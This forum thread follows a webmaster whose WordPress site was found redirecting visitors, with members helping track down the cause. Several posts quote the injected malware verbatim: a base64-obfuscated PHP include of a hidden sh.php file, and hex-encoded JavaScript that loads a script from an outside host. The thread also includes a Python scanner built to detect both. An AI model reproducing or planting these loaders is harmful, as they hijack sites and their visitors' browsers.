Redirection issue

  • Chezter
    Confirmed User
    • Apr 2008
    • 565

    #1

    Redirection issue

    Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com
    Last edited by Chezter; 12-14-2011, 11:34 AM.
  • Barry-xlovecam
    It's 42
    • Jun 2010
    • 18083

    #2
    This is what I found:

    Code:
    01:47:03.040	0.376	829	275	GET	302	Redirect to: http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4	http://speedclicks.ero-advertising.com/speedclicks/out.php?1=1&doc=IGVgu3Dty6GSAostqr8L2K4uQpGGG9kJqxw9NpiIUiRJTrqiDDR7dkadq3aCRibVgzMuMMTEaqRcdBHFUlYQV7PvWYodvBzt5kXjywSpa7HMidHXObQUYCj5dpH0TiRI&pid=29455&spaceid=134377&returnurl=http%3A%2F%2Fwww.adscampaign.com%2Fbanners.html&rcheck=MTMyMzg5NTA3Mg==
    
    01:47:03.613	0.193	540	203	GET	302	Redirect to: http://www.cam4.com?act=200116~us-c	http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4


    • Chezter
      Confirmed User
      • Apr 2008
      • 565

      #3
      Ok thank you, but I still do not know how to figure out what is causing it from this piece of code, but at least I see it is really true


      • Colmike9
        (>^_^)b
        • Dec 2011
        • 7230

        #4
        If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:

        teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js
        teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js
        Join the BEST cam affiliate program on the internet!
        I've referred over $1.7mil in spending this past year, you should join in.
        I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..


        • MikeFold
          Confirmed User
          • Nov 2001
          • 465

          #5
          went to your site via google search
          after the page loaded I
          got redirected here:

          http://17.uso2.com/

          edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds)
          LOL
          Last edited by MikeFold; 12-14-2011, 12:07 PM.
          nothing to promote


          • Colmike9
            (>^_^)b
            • Dec 2011
            • 7230

            #6
            Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish


            Also, is that last line of js after html tag supposed to be there?..

            • Chezter
              Confirmed User
              • Apr 2008
              • 565

              #7
              I don't know any slider I use on my so I just deleted them, but they looked alright, the file had exact size as original and so...


              • Chezter
                Confirmed User
                • Apr 2008
                • 565

                #8
                I see some strange piece of code right in the top of header.php so i put it away, is it still redirecting?


                • Colmike9
                  (>^_^)b
                  • Dec 2011
                  • 7230

                  #9
                  It doesn't redirect for me anymore so I hope that fixed your problem

                  • Chezter
                    Confirmed User
                    • Apr 2008
                    • 565

                    #10
                    Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

                    Code:
                    <?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>


                    • Colmike9
                      (>^_^)b
                      • Dec 2011
                      • 7230

                      #11
                      Originally posted by Chezter
                      Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

                      Code:
                      <?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
                      That's what I was thinking too but wasn't sure if you put it there or not. Are you using the latest version of WP (3.3) and maybe upgrade your php.

                      And change your passwords
                      Last edited by Colmike9; 12-14-2011, 01:22 PM.

                      • ruff
                        I have a plan B
                        • Aug 2004
                        • 5507

                        #12
                        Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

                        <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>
                        CryptoFeeds


                        • anexsia
                          Confirmed User
                          • May 2010
                          • 5735

                          #13
                          Originally posted by Chezter
                          Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

                          Code:
                          <?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
                          Whenever you see encoded stuff like that it's usually bad, you can also use a decoder to see what the actual code was. There's a lot of "free" wordpress theme websites that will put stuff like this in the theme. Always go through your header and footer checking for it.


                          • Colmike9
                            (>^_^)b
                            • Dec 2011
                            • 7230

                            #14
                            Originally posted by ruff
                            Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

                            <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>
                            That's the script under html that I was talking about, thought it was deleted.. My bad

                            Originally posted by Colmike7
                            Also, is that last line of js after html tag supposed to be there?..
                            Last edited by Colmike9; 12-14-2011, 01:41 PM.

                            • MediaGuy
                              Confirmed User
                              • Sep 2004
                              • 5500

                              #15
                              Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.

                              I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site.

                              To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did.

                              And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out.

                              When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes.

                              Oh, and update your version of wordpress.

                              YOU Are Industry News!
                              Press Releases: pr[at]payoutmag.com
                              Facebook: Payout Magazine! Facebook: MIKEB!
                              ICQ: 248843947
                              Skype: Mediaguy1


                              • Barry-xlovecam
                                It's 42
                                • Jun 2010
                                • 18083

                                #16
                                line 586 index.html

                                <!-- /wrapper -->



                                </body>

                                </html>

                                <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>


                                • Chezter
                                  Confirmed User
                                  • Apr 2008
                                  • 565

                                  #17
                                  It is the same code, just it was not only in header but it is in footer, index, links... everywhere
                                  Last edited by Chezter; 12-15-2011, 07:09 AM.


                                  • Chezter
                                    Confirmed User
                                    • Apr 2008
                                    • 565

                                    #18
                                    "Funny" is it is also in other domains on the same ftp account, just everywhere and it is there for 11 months, that's crazy, I would like to know how I could never see it in any site...

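One way to act on the "use a decoder" advice in post #13 and on the finding in posts #17 and #18 that the code sits in many files across several domains: an added Python example, not code from any poster, that decodes both injection shapes quoted in this thread and walks a directory tree looking for them. The regular expressions are assumptions drawn only from the two samples shown here, and the path and URL in `sample_page()` are constructed placeholders.

```python
import base64
import os
import re

# PHP shape: paired 32-hex marker comments around a base64-encoded include.
PHP_INJECT = re.compile(
    r"<\?/\*([0-9a-f]{32})\*/\?>(.*?)<\?/\*\1\*/\?>", re.DOTALL)
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# JS shape: hex string rebuilt via unescape() and document.write() in one tag.
T = r"(?:(?!</script>).)*?"
JS_HEX = re.compile(
    r"<script[^>]*>" + T + r"[\"']((?:[0-9a-fA-F]{2}){20,})[\"']" + T
    + r"unescape" + T + r"document\.write" + T + r"</script>", re.DOTALL)

def scan(text):
    """Return sorted (kind, offset, decoded, after_html_close) tuples."""
    html_end = text.lower().rfind("</html>")
    hits = []
    for m in PHP_INJECT.finditer(text):
        for b in B64_CALL.finditer(m.group(2)):
            path = base64.b64decode(b.group(1)).decode("utf-8", "replace")
            hits.append(("php-include", m.start(), path, False))
    for m in JS_HEX.finditer(text):
        markup = bytes.fromhex(m.group(1)).decode("utf-8", "replace")
        hits.append(("js-hex", m.start(), markup, -1 < html_end < m.start()))
    return sorted(hits, key=lambda h: h[1])

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Scan every matching file under root; returns {path: hits}."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits = scan(fh.read())
                if hits:
                    found[full] = hits
    return found

def sample_page():
    """Constructed input: placeholder path and URL, not values from the thread."""
    marker = "0123456789abcdef0123456789abcdef"
    b64 = base64.b64encode(b"/home/user/public_html/wp-includes/sh.php").decode()
    php = (f"<?/*{marker}*/?><?php $p = base64_decode('{b64}'); "
           f"@include_once $p;?><?/*{marker}*/?>")
    tag = b"<script src='http://redirector.example/index.php'></script>".hex()
    js = (f"<script>var i,y,x=\"{tag}\";y='';for(i=0;i<x.length;i+=2)"
          "{y+=unescape('%'+x.substr(i,2));}document.write(y);</script>")
    return php + "<html><body>post</body></html>\n" + js

if __name__ == "__main__":
    for hit in scan(sample_page()):
        print(hit)
```

The decoded path in a `php-include` hit names the file that the loader pulls in, so that file has to be removed along with the loader line; an empty result from `scan_tree` after a cleanup only means these two shapes are gone.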

                                    • Chezter
                                      Confirmed User
                                      • Apr 2008
                                      • 565

                                      #19
                                      Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.


                                      • MikeFold
                                        Confirmed User
                                        • Nov 2001
                                        • 465

                                        #20
                                        Originally posted by Chezter
                                        Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.
                                        ok...tried it for you again (different box and browser)
                                        it tried to hijack my browser.....i viewed source and this was still at the bottom

                                        Code:
                                        <script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>

                                        • Barry-xlovecam
                                          It's 42
                                          • Jun 2010
                                          • 18083

                                          #21
                                          check the version of your FTP program -- is it up to date?
                                          there was a problem like this a while back with old Filezilla apps -- maybe related


                                          • Chezter
                                            Confirmed User
                                            • Apr 2008
                                            • 565

                                            #22
                                            I use total commander 7.04 and it is probably not up to date


                                            • Chezter
                                              Confirmed User
                                              • Apr 2008
                                              • 565

                                              #23
                                              Reinstalled wordpress, reinstalled template, used new total commander, deleted everything I could so if it's still there then I'm really fucked....


                                              • Chezter
                                                Confirmed User
                                                • Apr 2008
                                                • 565

                                                #24
                                                I know I'm annoying, but is it still redirecting or not?
